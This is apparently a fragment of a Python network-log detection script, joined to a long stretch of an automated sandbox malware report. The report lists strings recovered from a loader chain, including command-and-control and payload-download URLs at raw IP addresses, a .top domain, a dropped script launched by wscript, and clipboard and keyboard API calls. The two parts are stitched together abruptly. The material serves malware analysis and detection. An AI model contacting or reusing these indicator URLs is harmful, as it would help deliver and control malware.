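Source: global trafficDNS traffic detected: DNS query: api.ip.sb
"""

HEADER_NAMES = ("Connection", "Content-Type", "User-Agent", "Content-Length", "Host")
# Split right before a known header name, whether or not a separator survived export.
_HDR_SPLIT = re.compile(r"\s*\|?\s*(?=(?:%s): )" % "|".join(HEADER_NAMES))
_REQ_LINE = re.compile(r"HTTP traffic detected: (?P<method>[A-Z]+) (?P<path>\S+) HTTP/1\.[01]")
_DNS_LINE = re.compile(r"DNS query: (?P<name>\S+)")
_IPV4 = re.compile(r"^\d{1,3}(?:\.\d{1,3}){3}$")
MIN_POSTS = 3  # assumption: POSTs to one path before it counts as a beacon


def parse_request(line):
    """Return {'method', 'path', 'headers'} for an HTTP entry, or None for other lines."""
    m = _REQ_LINE.search(line)
    if not m:
        return None
    headers = {}
    for chunk in _HDR_SPLIT.split(line[m.end():]):
        if ": " in chunk:
            name, _, value = chunk.partition(": ")
            headers[name] = value.strip()
    return {"method": m.group("method"), "path": m.group("path"), "headers": headers}


def analyze(text):
    """Run the heuristics over an export; returns a list of (rule, detail) tuples."""
    requests, resolved = [], set()
    for line in text.splitlines():
        req = parse_request(line)
        if req:
            requests.append(req)
            continue
        d = _DNS_LINE.search(line)
        if d:
            resolved.add(d.group("name").lower())

    hits = []
    posts = defaultdict(list)
    for req in requests:
        host = req["headers"].get("Host", "").lower()
        # Rule 1: a PE fetched from a literal IP address (a loader pulling further stages).
        if req["method"] == "GET" and req["path"].lower().endswith(".exe") and _IPV4.match(host):
            hits.append(("exe_from_bare_ip", host + req["path"]))
        if req["method"] == "POST":
            posts[(host, req["path"])].append(req)

    # Rule 2: repeated POSTs to one fixed path that mix small urlencoded check-ins
    # with large multipart uploads: the shape of a stealer's exfiltration channel.
    for (host, path), reqs in posts.items():
        ctypes = {r["headers"].get("Content-Type", "").split(";")[0] for r in reqs}
        sizes = [int(r["headers"].get("Content-Length", "0")) for r in reqs]
        if len(reqs) >= MIN_POSTS and {"multipart/form-data", "application/x-www-form-urlencoded"} <= ctypes:
            hits.append(("mixed_post_beacon", f"{host}{path} n={len(reqs)} max_bytes={max(sizes)}"))

    # Rule 3: Host headers that never appeared in a DNS query (hard-coded addresses).
    for host in sorted({r["headers"].get("Host", "").lower() for r in requests} - resolved):
        if host:
            hits.append(("host_without_dns", host))
    return hits


if __name__ == "__main__":
    for rule, detail in analyze(SAMPLE):
        print(f"{rule:20s} {detail}")
```

The header-name split is what makes this usable on a copy-pasted report: it recovers the boundary value "5xlGFa6u" correctly even when the export glues "User-Agent:" straight onto it. Rule 3 is stricter than the report's own "TCP traffic without corresponding DNS query" line because it is derived from the HTTP entries themselves, so it still fires on an export that omits the raw TCP section.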
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FFA000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php%z
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php4/FH
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.php:
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpG.
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpO/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpP.
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpU/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpX/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpd.
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpk.
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpl/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpq.
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpr/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpuz
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6/Ni9kiput/index.phpy/
                                    Source: rapes.exe, 0000000E.00000003.2603793681.0000000000FFA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.6l
                                    Source: powershell.exe, 00000005.00000002.1215195505.0000000004D75000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000000F8B000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/527224533/ReK7Ewx.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000000FE2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/527224533/ReK7Ewx.exe81dac97d7aee7
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000000F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/527224533/ReK7Ewx.exeshqos.dll
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/5419477542/ADFoyxP.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/5419477542/ADFoyxP.exeN
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/5526411762/CgmaT61.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/5526411762/yUI6F6C.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exe1dac97d7aee7f
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exe:
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000000F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exeat
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6386900832/PfOHmro.exes
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6691015685/V0Bt74c.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/6691015685/V0Bt74c.exe.
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7098980627/mAtJWNv.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000000F8B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7098980627/mAtJWNv.exe.AppDataBj
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7098980627/mAtJWNv.exeD
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmp, rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exeR
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001020000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/files/7868598855/zY9sqWs.exep
                                    Source: powershell.exe, 00000008.00000002.1316835189.00000287A8B70000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.7/mine/random.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
                                    Source: powershell.exe, 00000005.00000002.1219648140.0000000007319000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro(
                                    Source: powershell.exe, 00000005.00000002.1219942069.00000000073A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microy
                                    Source: svchost.exe, 0000000A.00000002.2865035263.0000021259A0E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                    Source: svchost.exe, 0000000A.00000003.1203356516.00000212598A8000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                                    Source: edb.log.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                                    Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                                    Source: qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                                    Source: svchost.exe, 0000000A.00000003.1203356516.00000212598A8000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                                    Source: svchost.exe, 0000000A.00000003.1203356516.00000212598A8000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                                    Source: svchost.exe, 0000000A.00000003.1203356516.00000212598DD000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                                    Source: qmgr.db.10.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                                    Source: ReK7Ewx.exe, 0000001C.00000002.3641720190.0000000000409000.00000002.00000001.01000000.00000013.sdmp, ReK7Ewx.exe, 0000001C.00000000.3045218076.0000000000409000.00000002.00000001.01000000.00000013.sdmp, ReK7Ewx[1].exe.14.dr, ReK7Ewx.exe.14.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                                    Source: powershell.exe, 00000005.00000002.1217606643.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1311737367.00000287A0A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1311737367.00000287A0BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0A
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0C
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0X
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://ocsp2.globalsign.com/rootr306
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://ocsp2.globalsign.com/rootr606
                                    Source: powershell.exe, 00000008.00000002.1234070143.0000028790C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                                    Source: powershell.exe, 00000005.00000002.1215195505.0000000004B11000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1234070143.0000028790A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.drString found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
                                    Source: Amcache.hve.54.drString found in binary or memory: http://upx.sf.net
                                    Source: powershell.exe, 00000008.00000002.1234070143.0000028790C3C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                                    Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, Occupation.com, 00000029.00000000.3120996848.00000000002F5000.00000002.00000001.01000000.00000014.sdmp, Digital.37.dr, EduGeniusX.com.41.drString found in binary or memory: http://www.autoitscript.com/autoit3/X
                                    Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com/CPS0
                                    Source: powershell.exe, 00000005.00000002.1219942069.00000000073A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.
                                    Source: powershell.exe, 00000005.00000002.1219942069.00000000073A1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.Q
                                    Source: powershell.exe, 00000008.00000002.1234070143.0000028790A11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                                    Source: powershell.exe, 00000005.00000002.1215195505.0000000004B11000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                                    Source: powershell.exe, 00000008.00000002.1311737367.00000287A0BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                                    Source: powershell.exe, 00000008.00000002.1311737367.00000287A0BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                                    Source: powershell.exe, 00000008.00000002.1311737367.00000287A0BC3000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                                    Source: svchost.exe, 0000000A.00000003.1203356516.0000021259952000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6
                                    Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/Prod.C:
                                    Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2
                                    Source: edb.log.10.dr, qmgr.db.10.drString found in binary or memory: https://g.live.com/odclientsettings/ProdV2.C:
Source: svchost.exe, 0000000A.00000003.1203356516.0000021259952000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr | String found in binary or memory: https://g.live.com/odclientsettings/ProdV2?OneDriveUpdate=f359a5df14f97b6802371976c96
Source: V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://garagedrootz.top/
Source: V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp, V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp, V0Bt74c.exe, 00000033.00000002.3542600563.0000000001002000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://garagedrootz.top/oPsoJAN
Source: V0Bt74c.exe, 00000033.00000002.3527792268.0000000000F54000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://garagedrootz.top/oPsoJANX
Source: V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FFF000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://garagedrootz.top/oPsoJANer
Source: V0Bt74c.exe, 00000033.00000002.3542112240.0000000000FD0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://garagedrootz.top:443/oPsoJAN
Source: powershell.exe, 00000008.00000002.1234070143.0000028790C3C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000005.00000002.1215195505.0000000005115000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1234070143.000002879163C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://go.micro
Source: rapes.exe, 0000000E.00000002.3651739250.0000000001070000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://mozilla.org0/
Source: powershell.exe, 00000005.00000002.1217606643.0000000005B77000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1311737367.00000287A0A80000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1311737367.00000287A0BC3000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: svchost.exe, 0000000A.00000003.1203356516.0000021259952000.00000004.00000800.00020000.00000000.sdmp, edb.log.10.dr, qmgr.db.10.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Installers/23.194.0917.0001/amd64/OneDriveSetup.exe
Source: edb.log.10.dr | String found in binary or memory: https://oneclient.sfx.ms/Win/Prod/21.220.1024.0005/OneDriveSetup.exe.C:
Source: Occupation.com, 00000029.00000003.3131831249.0000000003CB7000.00000004.00000800.00020000.00000000.sdmp, EduGeniusX.com.41.dr | String found in binary or memory: https://www.autoitscript.com/autoit3/
Source: EduGeniusX.com.41.dr | String found in binary or memory: https://www.globalsign.com/repository/0
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49809 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49814 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49816 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49817 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49819 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49822 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49821 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49825 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49826 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49828 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49830 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49832 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49833 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49836 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49842 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49846 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 104.21.16.1:443 -> 192.168.2.4:49850 version: TLS 1.2
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0049EAFF OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,GlobalLock,CloseClipboard,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,GlobalUnlock,IsClipboardFormatAvailable,GetClipboardData,GlobalLock,DragQueryFileW,DragQueryFileW,DragQueryFileW,GlobalUnlock,CountClipboardFormats,CloseClipboard
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0049ED6A OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0048AA57 GetKeyboardState,SetKeyboardState,PostMessageW,SendInput
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_004B9576 DefDlgProcW,SendMessageW,GetWindowLongW,SendMessageW,SendMessageW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,SendMessageW,SendMessageW,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,InvalidateRect,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW

                                    System Summary

Source: random.exe | String found in binary or memory: This is a third-party compiled AutoIt script.
Source: random.exe, 00000000.00000002.1170353812.00000000004E2000.00000002.00000001.01000000.00000003.sdmp | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_4d431a09-e)
Source: random.exe | String found in binary or memory: This is a third-party compiled AutoIt script. (memstr_48c926e7-8)
Source: C:\Users\user\Desktop\random.exe | File created: C:\Users\user\AppData\Local\Temp\tmxzSk7p3.hta
Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr | Static PE information: section name:
Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr | Static PE information: section name: .idata
Source: TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE.5.dr | Static PE information: section name:
Source: rapes.exe.11.dr | Static PE information: section name:
Source: rapes.exe.11.dr | Static PE information: section name: .idata
Source: rapes.exe.11.dr | Static PE information: section name:
Source: yUI6F6C[1].exe.14.dr | Static PE information: section name:
Source: yUI6F6C[1].exe.14.dr | Static PE information: section name: .idata
Source: yUI6F6C[1].exe.14.dr | Static PE information: section name:
Source: yUI6F6C.exe.14.dr | Static PE information: section name:
Source: yUI6F6C.exe.14.dr | Static PE information: section name: .idata
Source: yUI6F6C.exe.14.dr | Static PE information: section name:
Source: CgmaT61[1].exe.14.dr | Static PE information: section name:
Source: CgmaT61[1].exe.14.dr | Static PE information: section name: .idata
Source: CgmaT61[1].exe.14.dr | Static PE information: section name:
Source: CgmaT61.exe.14.dr | Static PE information: section name:
Source: CgmaT61.exe.14.dr | Static PE information: section name: .idata
Source: CgmaT61.exe.14.dr | Static PE information: section name:
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\TempWCSDEZST0YP2W0PLVFZEUCY7APYIBA7Q.EXE
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\EduGenius Studios Co\EduGeniusX.js"
Source: C:\Users\user\AppData\Local\Temp\bb556cff4a\rapes.exe | Process Stats: CPU usage > 49%
Source: C:\Users\user\Desktop\random.exe | Code function: 0_2_0048D5EB: CreateFileW,DeviceIoControl,CloseHandle
